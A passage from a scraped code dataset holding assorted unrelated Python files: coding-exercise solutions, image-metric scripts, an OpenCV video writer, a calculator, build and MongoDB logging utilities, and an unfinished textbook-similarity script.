\n\nprint(data.content)\ncon = b'{\\n \"userId\": 1,\\n \"id\": 1,\\n \"title\": \"delectus aut autem\",\\n \"completed\": false\\n}'\n\nprint(data.text, type(data.text))\ntext = '{\"userId\": 1,\"id\": 1,\"title\": \"delectus aut autem\",\"completed\": false}'\n\nprint(data.json(), type(data.json())) # {'userId': 1, 'id': 1, 'title': 'delectus aut autem', 'completed': False} \ndict_data = data.json()\n\n# with open(\"newnew.json\", \"wb\") as file:\n# file.write(requests.get(url=\"https://jsonplaceholder.typicode.com/todos/66\").content)\n\nage = 20\nmessage = \"I'm \" + str(age) + \" age!\"\nmessage2 = f\"I'm {age} age!\"\nprint(message2)\n\n# json_array = requests.get(url=\"https://jsonplaceholder.typicode.com/todos\").json()\n#\n# for obj in json_array:\n# print(obj, type(obj))\n# with open(f'temp/new{obj[\"id\"]}.json', \"w\") as file:\n# # file.write(json.dumps(obj))\n# json.dump(obj, file)\n\nprint(\"\\n\\n\\n\\n************\\n\\n\\n\\n\")\n\n# CRUD - create read update\nworkbook = openpyxl.load_workbook(\"new.xlsx\")\nworksheet = workbook.active\n\ncell1 = worksheet[\"C2\"]\nprint(cell1) # \nprint(cell1.value) # b_3\n\nlist5 = []\nfor number in range(1, 3+1):\n list5.append(worksheet[f\"A{number}\"].value)\nprint(list5)\n\nmatrix = []\nrows = []\nfor row in range(1, worksheet.max_row + 1):\n local_rows = []\n for column in range(1, worksheet.max_column + 1):\n # value = worksheet[f\"{get_column_letter(column)}{row}\"].value\n local_rows.append(worksheet.cell(row, column).value)\n rows.append(local_rows)\nprint(rows)\n\nvl = None\nvl1 = \"\"\nvl2 = False\n\n\nnew_workbook = openpyxl.Workbook()\n\nnew_worksheet = new_workbook.active\n\nindex = 0\nfor row in rows:\n for value in row:\n index += 1\n new_worksheet.cell(index, 1, 
value)\n\nnew_workbook.save(\"create.xlsx\")\n","repo_name":"bogdandrienko/PyE-222-1","sub_path":"projects/2/new/new2.py","file_name":"new2.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"9789048008","text":"from collections import defaultdict as dc \r\nt=lambda:map(int,input().split())\r\nn,x=t()\r\na=list(t())\r\nd=dc(list)\r\nfor i in range(n):\r\n for j in range(i+1,n):\r\n d[a[i]+a[j]]+=[i,j]\r\nfor i in range(n-1):\r\n for j in range(i+1,n):\r\n s=a[i]+a[j]\r\n if x-s not in d:\r\n continue\r\n p=d[x-s]\r\n if p[0]!=i and p[0]!=j and p[1]!=i and p[1]!=j:\r\n print(i+1,j+1,p[0]+1,p[1]+1)\r\n exit()\r\nprint(\"IMPOSSIBLE\")\r\n","repo_name":"charlie219/CSES-Solutions","sub_path":"Sorting and Searching/Sum of Four Values.py","file_name":"Sum of Four Values.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"7906922261","text":"import os\nimport numpy as np\nimport cv2\n\ndef load_images(folder):\n images = []\n for filename in sorted(os.listdir(folder)):\n img = cv2.imread(os.path.join(folder, filename))\n img = img/255\n if img is not None:\n images.append(img)\n return images\n\n\ndef calculate_precision(predicted_outputs, ground_truths):\n\n predicted_outputs = predicted_outputs > 0.5\n ground_truths = ground_truths > 0.5\n\n # assert predicted_outputs.shape == ground_truths.shape, \"Both masks should have the same shape.\"\n\n # Calculate true positives (TP)\n TP = np.sum(np.logical_and(predicted_outputs == 1, ground_truths == 1))\n\n # Calculate false positives (FP)\n FP = np.sum(np.logical_and(predicted_outputs == 1, ground_truths == 0))\n\n # Calculate precision\n precision = TP / (TP + FP) if (TP + FP) > 0 else 0\n\n return precision\n\ndef calculate_recall(predicted_outputs, ground_truths):\n\n predicted_outputs = predicted_outputs > 0.5\n ground_truths = ground_truths > 0.5\n\n # assert predicted_outputs.shape == ground_truths.shape, \"Both masks should have the same shape.\"\n\n # Calculate true positives (TP)\n TP = np.sum(np.logical_and(predicted_outputs == 1, ground_truths == 1))\n\n # Calculate false negatives (FN)\n FN = np.sum(np.logical_and(predicted_outputs == 0, ground_truths == 1))\n \n # Calculate recall\n recall = TP / (TP + FN) if (TP + FN) > 0 else 0\n\n return recall\n\ndef calculate_mae(predicted_outputs, ground_truths):\n mae_values = []\n for pred, gt in zip(predicted_outputs, ground_truths):\n mae = np.mean(np.abs(pred.astype(np.float32) - gt.astype(np.float32)))\n # print(\"mae: = \", mae)\n mae_values.append(mae)\n return mae_values\n\ndef calculate_fbeta_score(predicted_outputs, ground_truths, beta):\n fbeta_values = []\n for pred, gt in zip(predicted_outputs, ground_truths):\n precision = calculate_precision(pred, gt)\n recall = calculate_recall(pred, gt)\n # print(\"Recall: = \", recall)\n # print(\"Precision: =\", precision)\n if precision + recall == 0:\n fbeta_score = 0\n else:\n fbeta_score = (1 + beta) * (precision * recall) / (beta * precision + recall)\n fbeta_values.append(fbeta_score)\n\n return np.mean(fbeta_values)\n\npredicted_outputs_folder = \"/home/pvnatu/mihir/dl/Attention_U2Net/data/DUTS_test/u2net_results\"\nground_truths_folder = \"/home/pvnatu/mihir/dl/Attention_U2Net/data/DUTS_test/DUTS_testlabel\"\n\npredicted_outputs = load_images(predicted_outputs_folder)\nground_truths = load_images(ground_truths_folder)\n\nmae_values = 
calculate_mae(predicted_outputs, ground_truths)\nfbeta_score = calculate_fbeta_score(predicted_outputs, ground_truths, 0.3)\n\naverage_mae = np.mean(mae_values)\nprint(f\"Average MAE for all 1000 images: {average_mae:.4f}\")\nprint(\"Fbeta: = \", fbeta_score)","repo_name":"vaibhav02kadam/Attention-U2Net","sub_path":"Attention U2Net/Attention U2Net/calc_mae.py","file_name":"calc_mae.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"38103519945","text":"def savePrivateKey(private_key):\n    print(\"\\n~~~ Save Private Key ~~~\")\n    print(\"masukkan nama file (cth: namefile -> namefile.pri): \", end='')\n    file_name = input()\n    f = open(\"private_keys/\"+file_name+\".pri\", 'w')\n    f.write(str(private_key))\n    f.close()\n    print(\"~~~~~~\\n\")\n\n\ndef openPrivateKey():\n    print(\"\\n~~~ Load Private Key ~~~\")\n    print(\"masukkan nama file private key \\ndi folder private_keys (yang ada .pri nya): \", end='')\n    file_name = input()\n    try:\n        f = open(\"private_keys/\"+file_name, 'r')\n        content = f.read()\n        f.close()\n        return stringtokey(content)\n    except:\n        print(\"~~~~~~\\n\")\n        print(\"ngga ada nama file itu di folder private_keys, nyaa~\")\n    \n    print(\"~~~~~~\\n\")\n    \ndef saveSignFile(content):\n    print(\"\\n~~~ Save Sign File ~~~\")\n    print(\"masukkan nama file (cth: namefile -> namefile.txt): \", end='')\n    file_name = input()\n    f = open(\"file/\"+file_name+\".txt\", 'w')\n    f.write(str(content))\n    f.close()\n    print(\"file tersimpan pada: \", \"file/\"+file_name+\".txt\")\n    print(\"~~~~~~\\n\")\n\ndef openSignFile():\n    print(\"\\n~~~ Load Sign File ~~~\")\n    print(\"masukkan nama file sign \\ndi folder file: \", end='')\n    file_name = input()\n    try:\n        f = open(\"file/\"+file_name, 'r')\n        content = f.read()\n        f.close()\n        print(\"~~~~~~\\n\")\n        return content\n    except:\n        print(\"ngga ada nama file itu di folder file, nyaa~\")\n    \n    print(\"~~~~~~\\n\")\n\ndef openFile():\n    print(\"\\n~~~ Load File ~~~\")\n    print(\"masukkan nama file \\ndi folder file: \", end='')\n    file_name = input()\n    try:\n        f = open(\"file/\"+file_name, 'rb')\n        content = f.read()\n        f.close()\n        print(\"~~~~~~\\n\")\n        return content\n    except:\n        print(\"ngga ada nama file itu di folder file, nyaa~\")\n    \n    print(\"~~~~~~\\n\")\n    \n\n\ndef stringtokey(stringkey:str):\n    '''\n    Returns the key value from a key given in string form\n    '''\n    key_temp = (stringkey.replace(')', '')).split('(')[1]\n    k = key_temp.split(', ')[0]\n    n = key_temp.split(', ')[1].replace(\"'\", '')\n    key = int(k), int(n)\n    return key","repo_name":"FlitzyBlue332/kripto-makalah","sub_path":"src/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3774417989","text":"\"\"\"\nWe are given a row wise sorted matrix of size r*c, we need to find the median of the matrix given. It is assumed that r*c is always odd.\n\nInput:\nThe first line of input contains an integer T denoting the number of test cases. Each test case contains two integers r and c, where r is the number of rows and c is the number of columns in the array a[]. 
Next r lines contain space separated c elements each in the array a[].\n\nOutput:\nPrint an integer which is the median of the matrix.\n\nConstraints:\n1<= T <=100\n1<= r,c <=150\n1<= a[i][j] <=1000\n\nExample:\nInput:\n1\n3 3\n1 3 5\n2 6 9\n3 6 9\n\nOutput:\n5\n\"\"\"\n\ntCases = int(input())\nfor _ in range(tCases):\n    m, n = map(int, input().split())\n    l = []\n    # read all m rows of n values each before sorting\n    for _ in range(m):\n        l.extend(map(int, input().split()))\n    l.sort()\n    print(l[(n*m//2)])","repo_name":"amit-kr-debug/CP","sub_path":"Geeks for geeks/array/Median In a Row-Wise sorted Matrix.py","file_name":"Median In a Row-Wise sorted Matrix.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"40522905952","text":"import sys\nimport numpy as np\nfrom pathlib import Path\n\n#file = Path('txt-kopi.txt')\n#file.write_text(file.read_text().replace('-e', ''))\n\nA=np.loadtxt(\"AAA.txt\",dtype=\"str\")\nAA=list(A)\nprint(len(AA))\n\nB=np.loadtxt(\"BBB.txt\",dtype=\"str\")\nBB=list(B)\nprint(len(BB))\n\n\nprint(\"start\")\nvalue = len(AA)\ncounter=1\n\nfor i in BB[:]:  # iterate over a copy so removing items does not skip elements\n    if i in AA:\n        BB.remove(i)\n        counter += 1\n        procent = counter/value*100\n        print(\"C : \"+str(counter)+\" --- \"+str(procent)+\"%\" )\n    \nprint(str(BB))\n\nwith open(\"Result.txt\", \"a\") as file_object:\n    file_object.write(str(BB))\n\nprint(\"End\")\n","repo_name":"AnxiousLuna/replace_from_txtFile","sub_path":"replace_from_txtFile.py","file_name":"replace_from_txtFile.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71535658669","text":"def solution(stats, k):\n    \"\"\"\n    :param stats: list\n    :param k: int\n    :return: list\n    \"\"\"\n    da = {}\n    for stat in stats:\n        if stat in da:\n            da[stat] += 1\n        else:\n            da[stat] = 1\n\n    sa = list(sorted(list(set(stats))))\n\n    ans_n = 0\n    ans_l = -1\n    ans_r = -1\n\n    cur_n = 0\n    cur_l = -1\n    cur_r = -1\n\n    for i in sa:\n        if cur_r == i - 1 and da[i] >= k:\n            cur_n += 1\n            cur_r += 1\n        else:\n            if cur_n > ans_n:\n                ans_n = cur_n\n                ans_l = cur_l\n                ans_r = cur_r\n            cur_n = 1 if da[i] >= k else 0\n            cur_l = i if da[i] >= k else -1\n            cur_r = i if da[i] >= k else -1\n\n    if cur_n > ans_n:\n        ans_n = cur_n\n        ans_l = cur_l\n        ans_r = cur_r\n\n    if ans_n == 0:\n        return -1\n    else:\n        return ans_l + ans_r\n","repo_name":"devYuMinKim/coding_test_with_javascript","sub_path":"20221019/모범답안/20221019_06/team.py","file_name":"team.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42718223022","text":"from collections import defaultdict\nimport copy\n\ndef main(filename):\n    s = open(filename, \"r\").read()\n    ml=4\n    for i in range(ml,len(s)):\n        if(len(set(s[i-ml:i])) == ml):\n            print(\"p1: \"+str(i))\n            break\n    ml=14\n    for i in range(ml,len(s)):\n        if(len(set(s[i-ml:i])) == ml):\n            print(\"p2: \"+str(i))\n            break\n    \n\nif __name__ == \"__main__\":\n    main(\"input_t1\")\n    main(\"input\")\n","repo_name":"cosmicnotepin/aoc2022","sub_path":"day_6/1/p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12995213341","text":"#!/usr/bin/env python3\n# encoding:utf-8\n\n\nimport sys\nimport numpy as np\nimport cv2 as cv\n\ndef main():\n    # Set the video width and height\n    frame_size = (320, 240)\n\n    # Set the frame rate\n    fps = 25\n\n    # Video codec format (FourCC)\n    fourcc = cv.VideoWriter_fourcc('M','J','P','G')\n\n    # Create the writer\n    writer = 
cv.VideoWriter(\"myvideo.avi\", fourcc, fps, frame_size)\n # 检查是否创建成功\n if writer.isOpened() == False:\n print(\"Error creating video writer.\")\n sys.exit()\n\n for i in range(0, 100):\n\n # 设置视频帧画面\n im = np.zeros((frame_size[1], frame_size[0], 3), dtype=np.uint8)\n\n # 将数字绘制到画面上\n cv.putText(im, str(i), (int(frame_size[0]/3), int(frame_size[1]*2/3)), cv.FONT_HERSHEY_SIMPLEX, 3.0, (255, 255, 255), 3)\n\n # 保存视频帧到文件\"myvideo.avi\"\n writer.write(im)\n\n # 释放writer\n writer.release()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"OpenCVChina/OpenCVBookSourceCode","sub_path":"01-图像的基本操作/video_write.py","file_name":"video_write.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"33760377828","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @Time : 2020-10-05 15:28\n @Author : QDY\n @FileName: 633. 平方数之和.py\n @Software: PyCharm\n\"\"\"\n\"\"\"\n给定一个非负整数c,你要判断是否存在两个整数 a 和 b,使得a2 + b2 = c 。\n\n示例 1:\n输入:c = 5\n输出:true\n解释:1 * 1 + 2 * 2 = 5\n\n示例 2:\n输入:c = 3\n输出:false\n\n示例 3:\n输入:c = 4\n输出:true\n\n示例 4:\n输入:c = 2\n输出:true\n\n示例 5:\n输入:c = 1\n输出:true\n\n提示:\n0 <= c <= 231 - 1\n\n\"\"\"\n\n\nclass Solution:\n def judgeSquareSum(self, c: int) -> bool:\n # ss = set()\n # for i in range(int(c**0.5)+1):\n # tmp = i**2\n # ss.add(tmp)\n # if c-tmp in ss:return True\n # return False\n # l, r = 0, int(c**0.5) # 双指针\n # ll, rr = 0, r*r\n # while l<=r:\n # if ll + rr == c:return True\n # elif ll+rr < c:\n # l += 1\n # ll = l**2\n # else:\n # r -= 1\n # rr = r**2\n # return False\n\n # 一个非负整数 c 能够表示为两个整数的平方和,当且仅当 c 的所有形如 4k+3 的质因子的幂次均为偶数。\n if c <= 2: return True\n factor = 2\n while factor ** 2 <= c:\n if c % factor == 0:\n cnt = 0\n while c % factor == 0:\n c //= factor\n cnt += 1\n if factor % 4 == 3 and cnt & 1: return False\n factor += 1\n return c % 4 != 3 # 最后剩下的因子,幂次为1,不能是4k+3的形式\n","repo_name":"QDylan/Learning-","sub_path":"Leetcode/633. 平方数之和.py","file_name":"633. 
平方数之和.py","file_ext":"py","file_size_in_byte":1621,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"13672762409","text":"from configparser import ConfigParser\nimport os\nimport subprocess\nimport shutil\nimport glob\n\nheaderFolder = \"DFPAC\"\ntestPrefix = \"Test_\"\nroot = os.getcwd()\noutputDir = root + \"/bin/\"\nextrasDir = root + \"/extras/\"\ntestDir = root + \"/tests/\"\nsrcDir = root + \"/src/\"\n\njunkFileExtension = '.o'\nlibFileExtension = '.a'\n\n#shutil.rmtree(outputDir)\nif not os.path.exists(outputDir):\n os.mkdir(outputDir)\n\nif not os.path.exists(outputDir + headerFolder):\n os.mkdir(outputDir + headerFolder)\n\n#print(config[\"PLATFORM\"])\n\n\n\nmakeResult = subprocess.run([\"make\"], shell=True, cwd=srcDir)\nfor object in glob.iglob(os.path.join(srcDir, '*' + junkFileExtension)):\n os.remove(object)\nfor lib in glob.iglob(os.path.join(srcDir, '*' + libFileExtension)):\n shutil.copy(lib, outputDir)\n shutil.copy(lib, testDir)\nfor header in glob.iglob(os.path.join(srcDir, '*.h')):\n shutil.copy(header, outputDir + headerFolder)\n #print(makeResult)\n \n\n#this is not important and was throwing too many errors\n#generate needed csv files if needed\n#if not os.path.isfile(testDir + \"Test_DFPAC/Test.csv\"):\n #result = subprocess.run([\"python3 \" + extrasDir + \"GenerateTestData.py\"], shell=True, cwd=currentDir)\n #print(result)\n #shutil.copy(extrasDir + \"Test.csv\", testDir + \"Test_DFPAC/\")\n\nprint(\"************Testing************\")\n\n\ncurrentDir = testDir\nprint(currentDir)\nmakeResult = subprocess.run([\"make\"], shell=True, cwd=currentDir)\nmakeResult = subprocess.run([currentDir + '/' + 'Test_DFPAC.out'], shell=True, cwd=currentDir, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\nprint(\"test process completed. A copy of the test outputs can be found at /tests/DFTests.txt\")\nif(makeResult.returncode == 0):\n print(\"tests completed correctly printing results\")\nelse:\n print(\"tests did not complete\")\n print(makeResult)\n print(\"pritning results\")\n\nprint('\\n\\n\\n\\n\\n')\n\nwith open(\"./tests/DFTests.txt\", 'r') as f:\n print(f.read())\n\n\nprint(\"jobs done\")","repo_name":"PierceCappa/DataFramePAC","sub_path":"CompileTest.py","file_name":"CompileTest.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20967369974","text":"msg = [\"Enter an equation\",\n \"Do you even know what numbers are? Stay focused!\",\n \"Yes ... an interesting math operation. \"\n \"You've slept through all classes, haven't you?\",\n \"Yeah... division by zero. Smart move...\",\n \"Do you want to store the result? (y / n):\",\n \"Do you want to continue calculations? (y / n):\",\n \" ... lazy\",\n \" ... very lazy\",\n \" ... very, very lazy\",\n \"You are\",\n \"Are you sure? It is only one digit! (y / n)\",\n \"Don't be silly! It's just one number! Add to the memory? (y / n)\",\n \"Last chance! Do you really want to embarrass yourself? 
(y / n)\"]\nmemory = 0.0\n\n\ndef read_calc():\n global memory\n\n print(msg[0])\n user_input = input().split()\n\n op = user_input[1]\n\n x = user_input[0]\n if x == \"M\":\n x = str(memory)\n\n y = user_input[2]\n if y == \"M\":\n y = str(memory)\n\n calc = (op, x, y)\n return calc\n\n\ndef sanitize(arg):\n if arg[1].isalpha() or arg[2].isalpha():\n print(msg[1])\n return False\n if not str(arg[0]).endswith((\"+\", \"-\", \"*\", \"/\")):\n print(msg[2])\n return False\n else:\n return True\n\n\ndef operation(calc):\n check(calc[1], calc[2], calc[0])\n op_result = 0\n if calc[0] == \"+\":\n op_result = float(calc[1]) + float(calc[2])\n elif calc[0] == \"-\":\n op_result = float(calc[1]) - float(calc[2])\n elif calc[0] == \"*\":\n op_result = float(calc[1]) * float(calc[2])\n elif calc[0] == \"/\":\n if float(calc[2]) != 0.0:\n op_result = float(calc[1]) / float(calc[2])\n else:\n print(msg[3])\n return \"notTrue\"\n\n return op_result\n\n\ndef result():\n calc = read_calc()\n while not sanitize(calc):\n calc = read_calc()\n inner_result = operation(calc)\n while inner_result == \"notTrue\":\n calc = read_calc()\n while not sanitize(calc):\n calc = read_calc()\n inner_result = operation(calc)\n return inner_result\n\n\ndef save(outer_result):\n global memory\n print(msg[4])\n user_input = input()\n if user_input == \"y\":\n memory_is_tight(outer_result)\n\n\ndef memory_is_tight(v):\n global memory\n if not is_one_digit(v):\n memory = v\n else:\n index = 10\n while True:\n print(msg[index])\n user_input = input()\n if user_input != \"y\":\n break\n if index >= 12:\n memory = v\n break\n index = index + 1\n\n\ndef keepup():\n print(msg[5])\n user_input = input()\n if user_input == \"y\":\n main()\n else:\n quit()\n\n\ndef is_one_digit(v):\n if -10 < float(v) < 10 and float(v).is_integer():\n return True\n else:\n return False\n\n\ndef check(v1, v2, v3):\n global msg\n inner_msg = \"\"\n\n if is_one_digit(v1) and is_one_digit(v2):\n inner_msg = inner_msg + msg[6]\n\n if (float(v1) == 1 or float(v2) == 1) and v3 == \"*\":\n inner_msg = inner_msg + msg[7]\n\n if (float(v1) == 0 or float(v2) == 0) \\\n and (v3 == \"*\" or v3 == \"+\" or v3 == \"-\"):\n inner_msg = inner_msg + msg[8]\n\n if inner_msg != \"\":\n inner_msg = msg[9] + inner_msg\n\n print(inner_msg)\n\n\ndef main():\n global memory\n outer_result = result()\n print(outer_result)\n save(outer_result)\n keepup()\n\n\nmain()\n","repo_name":"mazzog/Python-Projects","sub_path":"honestCalculator/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36482211218","text":"__author__ = \"Cody Precord \"\n__svnid__ = \"$Id$\"\n__revision__ = \"$Revision$\"\n\n__all__ = [ 'IsUnicode', 'DecodeString']\n\n#-----------------------------------------------------------------------------#\n# Imports\nimport types\n\n#-----------------------------------------------------------------------------#\n\ndef IsUnicode(txt):\n \"\"\"Is the given string a unicode string\n @param txt: object\n @return: bool\n\n \"\"\"\n return isinstance(txt, types.UnicodeType)\n\ndef DecodeString(txt, enc):\n \"\"\"Decode the given string with the given encoding,\n only attempts to decode if the given txt is not already Unicode\n @param txt: string\n @param enc: encoding 'utf-8'\n @return: unicode\n\n \"\"\"\n if IsUnicode(txt):\n txt = txt.decode(enc)\n return 
txt\n","repo_name":"wxWidgets/wxPython-Classic","sub_path":"wx/tools/Editra/src/ebmlib/txtutil.py","file_name":"txtutil.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":297,"dataset":"github-code","pt":"37"} +{"seq_id":"43377617337","text":"class Solution(object):\n def isPalindrome(self, x):\n \"\"\"\n :type x: int\n :rtype: bool\n \"\"\"\n if x < 0:\n return False\n origin = x\n reverse = 0\n while x > 0:\n reverse = reverse * 10 + x % 10\n if reverse >= math.pow(2, 31):\n return False\n x = x / 10\n return (reverse == origin) \n","repo_name":"julienbin/leetcode","sub_path":"009_Palindrome_Number/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26129921071","text":"from pymongo import MongoClient\nimport datetime\nimport traceback\nfrom dotenv import load_dotenv\nimport os\n\n# 패키지 설치\n# pip install pymongo\n\nclass MongoDB_API:\n def __init__(self):\n load_dotenv(verbose=True)\n self.MONGO_PWD = os.getenv('MONGO_PWD')\n self.client = MongoClient(f'mongodb://temple:{self.MONGO_PWD}@localhost:27017/ArcadeData')\n self.log_db = self.client['ArcadeData']['log']\n\n def add_log(self, user_name, v_id, progress_time, arcade_type):\n try:\n content = {\n 'log_time': datetime.datetime.utcnow(),\n 'user_name': user_name,\n 'v_id': v_id,\n 'check_time': progress_time,\n 'arcade_type': arcade_type,\n }\n post_id = self.log_db.insert_one(content).inserted_id\n print(f'[OK] 새 데이터가 등록되었습니다. post_id : \"{post_id}\"')\n return None\n except:\n print(f'[Error] DB 데이터 추가 에러\\n{traceback.format_exc()}')\n return '[Failed] DB 데이터 추가 실패'\n \n def find_log(self):\n return self.log_db.find({}, {'_id': False}).sort('log_time')","repo_name":"Temple2001/arcade-manager","sub_path":"backend_python/db_api.py","file_name":"db_api.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32028152260","text":"import os\nimport pickle\nimport pandas as pd\nimport html as ihtml\nfrom bs4 import BeautifulSoup\nimport gensim\nimport spacy\n\nnlp = spacy.load(\"en_core_web_md\")\n# MIN_SIM_SCORE = 0.5\nN_DOCS = 10\n\nfrom data_loaders import BASE_DIR, DALITE_DISCIPLINES\nfrom utils_scrape_openstax import OPENSTAX_TEXTBOOK_DISCIPLINES\n\n# https://www.kaggle.com/ceshine/remove-html-tags-using-beautifulsoup\ndef clean_text(text):\n text = BeautifulSoup(ihtml.unescape(text)).text\n # text = re.sub(r\"http[s]?://\\S+\", \"\", text)\n # text = re.sub(r\"\\s+\", \" \", text)\n return text\n\n\ndef get_questions_df(discipline):\n\n if discipline in [\"Physics\", \"Chemistry\"]:\n fp = os.path.join(BASE_DIR, os.pardir, \"all_questions.csv\")\n df_q = pd.read_csv(fp)\n\n elif discipline == \"Ethics\":\n\n data_dir = os.path.join(BASE_DIR, os.pardir, \"data_harvardx\")\n\n fp = os.path.join(data_dir, \"dalite_20161101.csv\")\n df = pd.read_csv(fp)\n df_q1 = df[[\"assignment_id\", \"question_id\", \"question_text\"]].drop_duplicates(\n [\"assignment_id\", \"question_id\"]\n )\n\n files = [\n f\n for f in os.listdir(os.path.join(data_dir, \"video-text\"))\n if not f.startswith(\".\") and \"post\" not in f\n ]\n results = []\n for fn in files:\n d = {}\n d[\"assignment_id\"] = fn.replace(\".txt\", \"\").split(\"_\")[0]\n fp = os.path.join(data_dir, \"video-text\", fn)\n keyname = \"text\"\n with open(fp, \"r\") as f:\n d[keyname] = f.read()\n 
results.append(d)\n\n df_q = pd.DataFrame(results)\n\n files = [\n f\n for f in os.listdir(os.path.join(data_dir, \"video-text\"))\n if not f.startswith(\".\") and \"post\" in f\n ]\n results = []\n for fn in files:\n d = {}\n d[\"assignment_id\"] = fn.replace(\".txt\", \"\").split(\"_\")[0]\n fp = os.path.join(data_dir, \"video-text\", fn)\n keyname = \"expert_rationale\"\n with open(fp, \"r\") as f:\n d[keyname] = f.read()\n results.append(d)\n\n df_q = df_q.merge(pd.DataFrame(results), on=\"assignment_id\").sort_values(\n \"assignment_id\"\n )\n df_q[\"text\"] = (\n df_q[\"text\"]\n .str.replace(\"\\[MUSIC\\]\", \"\")\n .str.replace(\"\\[...\\]\", \"\")\n .str.replace(\"SPEAKER: \", \"\")\n .str.replace(\"SPEAKER 1: \", \"\")\n .str.replace(\"PROFESSOR: \", \"\")\n .str.replace(\"\\[Music\\]\", \"\")\n )\n\n df_q[\"expert_rationale\"] = (\n df_q[\"expert_rationale\"]\n .str.replace(\"MICHAEL SANDEL: \", \"\")\n .str.replace(\"MICHEAL SANDEL: \", \"\")\n .str.replace(\"MICHAEL J. SANDEL: \", \"\")\n .str.replace(\"PROF. Michael Sandel: \", \"\")\n .str.replace(\"Professor Sandel: \", \"\")\n .str.replace(\"PROFESSOR: \", \"\")\n .str.replace(\"SPEAKER 1: \", \"\")\n .str.replace(\"SPEAKER: \", \"\")\n )\n\n df_q = df_q.merge(df_q1, on=\"assignment_id\", how=\"outer\")\n df_q[\"text\"] = (\n df_q[\"text\"].astype(str) + \" \" + df_q[\"question_text\"].astype(str)\n )\n\n df_q.loc[df_q[\"question_text\"].isna(), \"question_text\"] = df_q.loc[\n df_q[\"question_text\"].isna(), \"text\"\n ]\n df_q[\"question_id\"] = df_q[\"question_id\"].fillna(0).astype(int)\n\n df_q[\"topic\"] = (\n df_q[\"question_text\"]\n .str.strip(\"[?.,]\")\n .apply(lambda x: max(x.split(), key=len))\n )\n df_q[\"title\"] = df_q[\"question_id\"].astype(str) + \"_\" + df_q[\"topic\"]\n\n df_q = df_q.fillna(\" \")\n\n df_q[\"text\"] = df_q[\"text\"].apply(clean_text)\n\n df_q[\"expert_rationale\"] = df_q[\"expert_rationale\"].apply(clean_text)\n return df_q\n\n\ndef book_corpus_reader(discipline, model_name=\"doc2vec\"):\n \"\"\"\n Arguments:\n ----------\n discipline -> str\n model_name -> str; optional\n\n Returns:\n --------\n generator of either:\n - gensim.doc2vec.TaggedDocument\n - if model==\"lsi\" : lists of tokens for each document, lemmatized,\n with stopwords and numeric tokens removed\n \"\"\"\n books = OPENSTAX_TEXTBOOK_DISCIPLINES[discipline]\n fnidx = -1\n for book in books:\n book_dir = os.path.join(BASE_DIR, os.pardir, \"textbooks\", discipline, book)\n files = [f for f in os.listdir(book_dir) if not \"key-terms\" in f]\n files.sort()\n for fp in files:\n fp = os.path.join(book_dir, fp)\n with open(fp, \"r\") as f:\n for i, line in enumerate(f):\n fnidx += 1\n tokens = [\n token.lemma_.lower()\n for token in nlp(line)\n if not token.is_punct and token.is_alpha and not token.is_stop\n ]\n if model_name == \"lsi\":\n yield \" \".join(tokens)\n else:\n f_id = f\"{os.path.basename(fp)}_{i}_{fnidx}\"\n yield gensim.models.doc2vec.TaggedDocument(tokens, [f_id])\n\n\ndef build_similarity_models(\n discipline, save=True, population=\"switchers\", output_dir_name=\"exp2\"\n):\n \"\"\"\n Arguments:\n ----------\n discipline -> str\n\n Returns:\n --------\n model_lsi : trained gensim.LsiModel\n model_d2v : trained gensim.models.Doc2Vec\n dictionary : gensim.Dictionary\n corpus : list of BoW represenetations\n documents : textbook as list of docs\n tagged_documents : list of doc2vec TaggedDocuments\n \"\"\"\n print(f\"1 - reading textbook {discipline}\")\n documents = list(book_corpus_reader(discipline, 
